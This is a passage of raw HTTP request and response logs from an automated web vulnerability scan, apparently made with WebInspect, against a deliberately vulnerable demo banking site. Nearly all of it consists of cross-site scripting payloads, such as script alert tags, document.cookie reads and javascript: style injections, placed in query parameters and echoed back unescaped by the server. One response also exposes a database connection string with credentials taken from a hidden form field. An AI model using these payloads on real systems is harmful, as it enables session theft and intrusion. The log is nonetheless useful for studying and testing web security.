<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE="1"style="background:url(javascript:alert('XSS'))" ""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /_vti_txt/ HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:25:54 GMT Content-Length: 4214 Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html dir=ltr> <head> <style> a:link {font:8pt/11pt verdana; color:FF0000} a:visited {font:8pt/11pt verdana; color:#4e4e4e} </style> <META NAME="ROBOTS" CONTENT="NOINDEX"> <title>The page cannot be displayed</title> <META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252"> </head> <script> function Homepage(){ <!-- // in real bits, urls get returned to our script like this: // res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm //For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm" DocURL=document.URL; //this is where the http or https will be, as found by searching for :// but skipping the res:// protocolIndex=DocURL.indexOf("://",4); //this finds the ending slash for the domain server serverIndex=DocURL.indexOf("/",protocolIndex + 3); //for the href, we need a valid URL to the domain. We search for the # symbol to find the begining //of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker. //urlresult=DocURL.substring(protocolIndex - 4,serverIndex); BeginURL=DocURL.indexOf("#",1) + 1; urlresult=DocURL.substring(BeginURL,serverIndex); //for display, we need to skip after http://, and go to the next slash displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex); InsertElementAnchor(urlresult, displayresult); } function HtmlEncode(text) { return text.replace(/&/g, '&amp').replace(/'/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;'); } function TagAttrib(name, value) { return ' '+name+'="'+HtmlEncode(value)+'"'; } function PrintTag(tagName, needCloseTag, attrib, inner){ document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) ); if (needCloseTag) document.write( '</' + tagName +'>' ); } function URI(href) { IEVer = window.navigator.appVersion; IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 ); return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ? encodeURI(href) : escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';'); } function InsertElementAnchor(href, text) { PrintTag('A', true, TagAttrib('HREF', URI(href)), text); } //--> </script> <body bgcolor="FFFFFF"> <table width="410" cellpadding="3" cellspacing="5"> <tr> <td align="left" valign="middle" width="360"> <h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1> </td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana"> <hr color="#C0C0C0" noshade> <p>Please try the following:</p> <ul> <li>Open the <script> <!-- if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2"))) { Homepage(); } //--> </script> home page, and then look for links to the information you want.</li> <li>Click the <a href="javascript:location.reload()"> Refresh</a> button, or try again later.<br> </li> </ul> <h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br> Internet Information Services</h2> <hr color="#C0C0C0" noshade> <p>Technical Information (for support personnel)</p> <ul> <p> <li>Background:<br> This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p> <p> <li>More information:<br> <a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a> </li></p> </ul> </font></td> </tr> </table> </body> </html>
POST /pformresults.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/pindex.asp.bak Content-Length: 182 Content-Type: application/x-www-form-urlencoded Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=test@<script>alert(document.cookie)</script>.com&txtLastName=Swinney
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:56:51 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 397 Content-Type: text/html Cache-control: private <html> <body> <P>The parameter "txtFirstName" = test@<script>alert(document.cookie)</script>.com</P> <P>The parameter "txtLastName" = Swinney</P><br> <P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br> <P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br> <a href="pindex.asp">Click here to return to index</a> </body> </html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=--><script>alert('XSS')</script> HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:43 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 3982 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>--><script>alert('XSS')</script></center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /join.asp?name=&email=&surname=&house=>"><script>alert("XSS")</script>&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:32 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4006 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=">"><script>alert("XSS")</script>"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /forgot2.asp?msg2=no&msg=</textarea><script>alert('XSS')</script> HTTP/1.0 Referer: http://zero.webappsecurity.com:80/forgot1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:56:01 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 1854 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Forgotten Password</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>F&nbsp;O&nbsp;R&nbsp;G&nbsp;O&nbsp;T&nbsp;T&nbsp;E&nbsp;N&nbsp;&nbsp;&nbsp;&nbsp;P&nbsp;A&nbsp;S&nbsp;S&nbsp;W&nbsp;O&nbsp;R&nbsp;D</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <tr><td bgcolor=#c000ff><b><center>Forgotton Password</center></a></b></td></tr> <tr bgcolor=#003388><td align="center">&nbsp;</td></tr> <tr bgcolor=#003388><td align="center"></textarea><script>alert('XSS')</script></td></tr> <tr bgcolor=#003388><td align="center">&nbsp;</td></tr> <tr bgcolor=#c000ff><td align="center">&nbsp;</td></tr> <tr bgcolor=#003388><td align="center">&nbsp;</td></tr> <tr bgcolor=#003388><td align="center"><b><a href="login.asp">Login</a></b></td></tr> <tr bgcolor=#003388><td align="center">&nbsp;</td></tr> <tr bgcolor=#003388><td align="center"><b><a href="join.asp">Join</a></b></td></tr> <tr bgcolor=#003388><td align="center">&nbsp;</td></tr> </form> </Table> </table> </body> </html>
GET /banklogin.asp?err=1"style="background:url(javascript:alert('XSS'))"%20" HTTP/1.0 Referer: http://zero.webappsecurity.com:80/login1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:37:05 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4966 Content-Type: text/html Cache-control: private Set-Cookie: state=; path=/ Set-Cookie: userid=; path=/ Set-Cookie: username=; path=/ Set-Cookie: sessionid=; path=/ <HTML> <HEAD> <TITLE></TITLE> </HEAD> <BODY> <TABLE BGCOLOR="#ffffff" STYLE="border: 3px solid black"> <TR> <TD STYLE="border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3" HEIGHT="47" ROWSPAN="2" VALIGN="TOP"><IMG SRC="/images/freebank-logo2.gif" ALIGN="LEFT" BORDER="0" WIDTH="150" HEIGHT="50"><BR><BR></TD> <TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" HEIGHT="47" VALIGN="TOP">&nbsp;</TD> <TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" VALIGN="TOP">&nbsp;</TD> </TR> <TR> <TD WIDTH="571" VALIGN="TOP" ROWSPAN="7" HEIGHT="49"> <TABLE> <TR> <TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="217"> <FORM ACTION="login1.asp" METHOD="post"> <CENTER>1"style="background:url(javascript:alert('XSS'))" "<br>Username:<BR><INPUT TYPE="text" NAME="login" STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR><INPUT TYPE="password" NAME="password" STYLE="border: 1px solid black; spacing: 0"><BR><INPUT TYPE="radio" NAME="graphicOption" VALUE="minimum" CHECKED="CHECKED"><FONT SIZE="-1">Minimum Graphics</FONT><BR><INPUT TYPE="radio" NAME="graphicOption" VALUE="standard"><FONT SIZE="-1">Standard Graphics</FONT><BR><BR><INPUT TYPE="submit" STYLE="border: 1px solid black" VALUE=" Access Accounts "><BR></CENTER></FORM></TD> <TD STYLE="border: 1px solid black" WIDTH="304" HEIGHT="217" ROWSPAN="2"><IMG SRC="/images/lock.gif" WIDTH="304" HEIGHT="266" BORDER="0"></TD> </TR> <TR> <TD BGCOLOR="ffffff" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="241" VALIGN="TOP"><FONT SIZE="-2">We are confident of our system's ability to protect all transactions; however, this is not an invitation for people to attempt unauthorized access to the system. This is a private computing system which is restricted to authorized individuals. Actual or attempted unauthorized use of this computer system may result in criminal and/or civil prosecution. We reserve the right to view, monitor, and record activity on the system without notice or permission. Any information obtained by monitoring, reviewing, or recording is subject to review by law enforcement organizations in connection with the investigation or prosecution of possible criminal activity on the system. If you are not an authorized user of this system or do not consent to continued monitoring, exit the system at this time. </FONT></TD> </TR> </TABLE></TD> <TD WIDTH="175" VALIGN="TOP" ROWSPAN="7"><table width="175" border="0" cellspacing="3" cellpadding="5"> <tr> <td STYLE="border: 1px solid black"><p><img src="images/SPI_logo.jpg" width="150" height="36"></p> <p><font size="2" face="Arial, Helvetica, sans-serif">If you would like a free trial version of WebInspect to test this website site.</font></p> <p><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://www.spidynamics.com/download.html" target="_blank"><strong>Download Click Here</strong></a></font></p></td> </tr> </table></TD> </TR> <TR> <TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG SRC="/images/customer-login.gif" ALIGN="LEFT" HEIGHT="20" BORDER="0"></TD> </TR> <TR> <TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><A HREF="/pindex.asp"><IMG SRC="/images/financial-planning.gif" ALIGN="LEFT" BORDER="0" WIDTH="150" HEIGHT="20"></A></TD> </TR> <TR> <TD STYLE="border: 2px solid #2E7AA3" WIDTH="162" HEIGHT="19"><IMG SRC="/images/services.gif" ALIGN="LEFT" HEIGHT="20" BORDER="0"></TD> </TR> <TR> <TD STYLE="border: 2px solid #2E7AA3" WIDTH="162" HEIGHT="24"><IMG SRC="/images/your-accounts.gif" ALIGN="LEFT" HEIGHT="20" BORDER="0"></TD> </TR> <TR> <TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG SRC="/images/customer-support.gif" ALIGN="LEFT" HEIGHT="20" BORDER="0"></TD> </TR> <TR> <TD STYLE="border-left: 12px solid #2E7AA3" WIDTH="162" ALIGN="CENTER">&nbsp; <FORM ACTION="rootlogin.asp" METHOD="post"> <P><FONT SIZE="-1" FACE="Arial"> Register for an Interest Checking Account with FreeBank:</FONT></P> <P><FONT SIZE="-1" FACE="Arial">First Name:</FONT><INPUT TYPE="text" NAME="txtPassPhrase" STYLE="border: 1px solid black; spacing: 0"><BR><FONT SIZE="-1" FACE="Arial">Last Name:</FONT><INPUT TYPE="text" NAME="txtName" STYLE="border: 1px solid black; spacing: 0"><BR> <INPUT TYPE="hidden" NAME="txtHidden" VALUE="This was hidden from the user"> <INPUT TYPE="submit" STYLE="border: 1px solid black" VALUE="Register"></P></FORM></TD> </TR> </TABLE> </BODY> </HTML>
GET /test/ HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:25:33 GMT Content-Type: text/html Content-Length: 172 <html><head><title>Directory Listing Denied</title></head> <body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>
GET /join.asp?name=&email=test@<script>alert(document.cookie)</script>.com&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:54:37 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4022 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE="test@<script>alert(document.cookie)</script>.com"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD 